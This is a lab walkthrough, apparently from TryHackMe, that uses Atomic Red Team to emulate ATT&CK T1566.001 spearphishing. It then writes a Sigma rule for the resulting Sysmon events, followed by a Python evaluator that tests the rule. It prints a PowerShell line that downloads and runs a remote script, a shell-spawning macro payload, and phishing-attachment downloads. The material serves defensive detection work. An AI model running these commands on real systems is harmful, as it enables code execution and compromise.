Cyber Attacks and the Kill Chain

Cyberattacks follow a predictable sequence of phases, described by the Unified Cyber Kill Chain. Ideally, blue teams would stop attacks during reconnaissance. However, this is impossible. The goal is therefore to implement detection across all phases of the kill chain, creating redundancy: even if one phase is missed, detection in a later phase ensures the attacker is identified before achieving their objective.


MITRE ATT&CK

The MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework catalogs real-world tactics, techniques, and procedures (TTPs) used by threat actors throughout the cyber kill chain. It also provides the ATT&CK Navigator tool for exploring and investigating these TTPs.

NOTE

The framework describes TTPs mainly at a conceptual level, which makes it difficult to test for, or close, specific detection gaps. Atomic tests (Atomics) provide practical, repeatable methods to identify and close these gaps.


Atomic Red

The Atomic Red Team library offers red team test cases mapped to the MITRE ATT&CK framework. These small, focused test cases help blue teams identify and address detection gaps. They can be executed manually or automated for streamlined testing.


Practical

McSkidy suspects that the supposed attacker used the MITRE ATT&CK technique T1566.001 Spearphishing with an attachment. Let’s recreate the attack emulation performed by the supposed attacker and then look for the artefacts created.

Here are the Invoke-AtomicTest parameters we need in this walkthrough, each with an explanation and an example use:

  • -AtomicTechnique: Defines the technique to emulate. Use the full technique name or the "TXXXX" value. Example: Invoke-AtomicTest -AtomicTechnique T1566.001

  • -ShowDetails: Shows the details of each test included in the Atomic. Example: Invoke-AtomicTest T1566.001 -ShowDetails

  • -ShowDetailsBrief: Shows only the title of each test included in the Atomic. Example: Invoke-AtomicTest T1566.001 -ShowDetailsBrief

  • -CheckPrereqs: Checks whether all components necessary for the test are present. Example: Invoke-AtomicTest T1566.001 -CheckPrereqs

  • -TestNames: Executes tests selected by their complete Atomic Test Name. Example: Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment"

  • -TestGuids: Executes tests selected by their unique test identifier. Example: Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306

  • -TestNumbers: Executes tests selected by their test number (numbering is scoped to the Atomic Technique). Example: Invoke-AtomicTest T1566.001 -TestNumbers 2,3

  • -Cleanup: Runs the cleanup commands to revert the machine state to normal. Example: Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup

To get this information, we include the name of the technique we want information about and then add the -ShowDetails flag to our command. Let’s have a look at the command we constructed: Invoke-AtomicTest T1566.001 -ShowDetails. This command displays the details of all tests included in the T1566.001 Atomic, including the attack commands, cleanup commands and dependency checks:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Loading personal and system profiles took 631ms.
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
 
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating
an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" and PhishingAttachment.txt
 are downloaded to the %temp% directory.
 
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
$url2 = 'http://localhost/PhishingAttachment.txt'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
Invoke-WebRequest -Uri $url2 -OutFile $env:TEMP\PhishingAttachment.txt
 
Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
Remove-Item $env:TEMP\PhishingAttachment.txt -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
 
 
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indiciat
or of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8
 
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
 
Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore
Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore
 
Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Check Prereq Command (with inputs):
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]
 

Phishing: Spearphishing Attachment T1566.001 Emulated

Let’s continue and run the first test of T1566.001. Before running the emulation, we should ensure that all required resources are in place to conduct it successfully. To verify this, we add the -CheckPrereqs flag to our command (PowerShell also accepts the unambiguous prefix -CheckPrereq, as used below). The command looks like this: Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq.

PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
 
CheckPrereq's for: T1566.001-1 Download Macro-Enabled Phishing Attachment
Prerequisites met: T1566.001-1 Download Macro-Enabled Phishing Attachment

Now that we have verified the dependencies, let us continue with the emulation. Execute the following command to start it: Invoke-AtomicTest T1566.001 -TestNumbers 1. You should get the following output:

PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
 
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment

Based on the output, we can determine that the test was executed successfully. We can now analyse the logs in the Windows Event Viewer to find Indicators of Attack and Indicators of Compromise.


Alerting on the Atomic

In the previous step, we found multiple indicators of compromise in the Sysmon event log. We can use this information to create detection rules for our EDR, SIEM, IDS, etc. These tools allow us to import custom detection rules in several formats, including YARA, Sigma, Snort, and more. Let’s look at how we can turn the artefacts related to T1566.001 into a custom Sigma rule.

Two events contained possible indicators of compromise. Let’s focus on the event that contained the Invoke-WebRequest command line:

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}"

We can use multiple parts of this artefact to include in our custom Sigma rule.

  • Invoke-WebRequest: It is not common for this cmdlet to run from a script behind the scenes on an end-user workstation.

  • $url = 'http://localhost/PhishingAttachment.xlsm': Attackers often host their payloads on a specific malicious domain. Including that URL in the Sigma rule lets us detect downloads from it.

  • PhishingAttachment.xlsm: This is the malicious payload downloaded and saved on our system. We can include its file name in the Sigma rule as well.

Combining all these pieces of information in a Sigma rule would look something like this:

title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 00000000-0000-0000-0000-000000000000   # placeholder: Sigma rule ids are UUIDs, generate a fresh one
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
  product: windows
  service: sysmon   # raw Sysmon channel, so that both Event ID 1 and Event ID 11 can be matched in one rule
detection:
  selection_invoke_webrequest:
    EventID: 1  # Sysmon Event ID for Process Creation
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'http://localhost/PhishingAttachment.xlsm'
  selection_file_creation:
    EventID: 11  # Sysmon Event ID for File Creation
    TargetFilename|endswith: '\PhishingAttachment.xlsm'
  condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
  - Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
  - attack.t1071.001   # Web Protocols - Application Layer Protocol
  - attack.t1059.001   # PowerShell
  - attack.t1105       # Ingress Tool Transfer
  - attack.t1566.001   # Spearphishing Attachment

The detection section is where the actual matching happens: it lists the artefacts we discovered during the emulation test, one selection per Sysmon event type, joined by the condition. We can then import this rule into the tools we use for alerting, such as an EDR, SIEM or XDR.
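To see what the detection section above actually fires on, here is an added example that is not part of this page, of Atomic Red Team, or of the Sigma project: a minimal evaluator for just the Sigma features the rule uses (exact match, contains, endswith, the all flag, AND across fields, OR across a value list, and and/or/not in the condition), run over three constructed Sysmon events. The events and the tightened variant of the first selection are my assumptions; contains|all is a standard Sigma modifier.

```python
"""Added example (not from the page, Atomic Red Team or Sigma): evaluate the
detection block of the Sigma rule above against constructed Sysmon events.
Only the Sigma features that rule needs are implemented."""

# Detection block of the rule above, transcribed to a dict (no YAML dependency).
PAGE_RULE = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains": [
            "Invoke-WebRequest",
            "http://localhost/PhishingAttachment.xlsm",
        ],
    },
    "selection_file_creation": {
        "EventID": 11,
        "TargetFilename|endswith": "\\PhishingAttachment.xlsm",
    },
    "condition": "selection_invoke_webrequest or selection_file_creation",
}

# Tightened variant (my assumption, not from the page): the `all` flag requires
# BOTH strings in the command line instead of matching on either one.
TIGHT_RULE = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains|all": [
            "Invoke-WebRequest",
            "http://localhost/PhishingAttachment.xlsm",
        ],
    },
    "selection_file_creation": PAGE_RULE["selection_file_creation"],
    "condition": PAGE_RULE["condition"],
}

# Constructed Sysmon events: the two artefacts from the emulation plus an
# ordinary administrative download that has nothing to do with the Atomic.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"""powershell.exe & {$url = 'http://localhost/PhishingAttachment.xlsm'; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}"""},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Administrator\AppData\Local\Temp\PhishingAttachment.xlsm"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Command Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile C:\Temp\agent.msi"},
]


def field_matches(event, key, expected):
    """Apply one 'Field|modifier' entry of a selection to a single event."""
    field, *mods = key.split("|")
    actual = event.get(field)
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    combine = all if "all" in mods else any      # a value list is OR unless `all` is set
    text = str(actual).lower()                   # Sigma string matching is case-insensitive
    if "contains" in mods:
        return combine(str(v).lower() in text for v in values)
    if "endswith" in mods:
        return combine(text.endswith(str(v).lower()) for v in values)
    return combine(actual == v for v in values)  # plain equality, used for EventID


def selection_matches(event, selection):
    """Every field listed in a selection must match (implicit AND)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def eval_condition(tokens, results):
    """Tiny recursive-descent evaluator for the condition: not > and > or."""
    def parse_or(i):
        val, i = parse_and(i)
        while i < len(tokens) and tokens[i] == "or":
            rhs, i = parse_and(i + 1)
            val = val or rhs
        return val, i

    def parse_and(i):
        val, i = parse_not(i)
        while i < len(tokens) and tokens[i] == "and":
            rhs, i = parse_not(i + 1)
            val = val and rhs
        return val, i

    def parse_not(i):
        if tokens[i] == "not":
            val, i = parse_not(i + 1)
            return (not val), i
        return results[tokens[i]], i + 1         # KeyError for an unknown selection name

    val, i = parse_or(0)
    if i != len(tokens):
        raise ValueError("unparsed condition tokens: " + " ".join(tokens[i:]))
    return val


def rule_matches(rule, event):
    """True if the rule's condition holds for this event."""
    results = {name: selection_matches(event, sel)
               for name, sel in rule.items() if name != "condition"}
    return eval_condition(rule["condition"].split(), results)


def matching_indices(rule, events=SAMPLE_EVENTS):
    """Indices of the events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == "__main__":
    print("page rule fires on events:", matching_indices(PAGE_RULE))   # [0, 1, 2]
    print("tightened rule fires on:", matching_indices(TIGHT_RULE))    # [0, 1]
```

The point the run makes is the one the falsepositives field hints at: because a value list under contains is OR-ed, the rule as written fires on the third event, an unrelated Invoke-WebRequest download, as well as on the two emulation artefacts. Adding the all flag to that selection keeps the two true positives and drops the benign download, at the cost of no longer catching the same payload hosted elsewhere; which trade-off is right depends on the environment.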
